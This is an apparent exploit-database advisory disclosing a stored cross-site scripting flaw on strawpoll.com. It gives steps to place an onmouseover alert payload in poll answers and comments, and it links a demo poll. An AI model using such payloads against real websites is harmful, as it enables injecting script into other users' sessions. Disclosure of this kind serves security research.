strawpoll Xss Stored

2020.10.18
sa 0xSilver (SA) sa
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

############################0xSilver############################ # Exploit Author: @Meshari-Almalki # Exploit Title: Strawpoll - Cross Site Scripting (Stored) # Vendor: strawpoll.com # Date: 2020-10-18 # Software Version: * # Software Link: N/A # Google Dork: N/A ############################################################# [*] Vuln Info: ============== Cross-Site Scripting or XSS attack is a security exploitation in which an attacker places malicious client-end code onto a web page. Attackers using XSS vulnerabilities steal user data, or control user sessions, run malicious code or even use it as a major component of phishing scams. ############################################################# [*] Vuln poc ==================== [1] - Go to strawpoll.com [2] - Sign in and Create new poll [3] -Fill Answer Options with this payload ==> <a onmouseover="alert(document.domain)">0xSilver</a> [4] - Now you can see in top the payload will be execute when you mouse over it . ============================================================= [*] Another Exploit : [-] After create poll or visit any poll of another people [-] go to comment and send it with this payload ==> <a onmouseover="alert(document.domain)">0xSilver</a> [-] go to your comment after sent and click on delete , then mouse over it , will be execute ############################################################# [*] Demo: ========= https://strawpoll.com/sqvuggup3 <meta name="description" content="What's your opinion? Vote now: <a onmouseover="alert(document.domain)">0xSilver</a>, <a onmouseover="alert(document.domain)">0xSilver</a>" /> ############################################################# [*] Contact: ============ # Telegram: t.me/x0Saudi # Twitter: twitter.com/slv0d


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top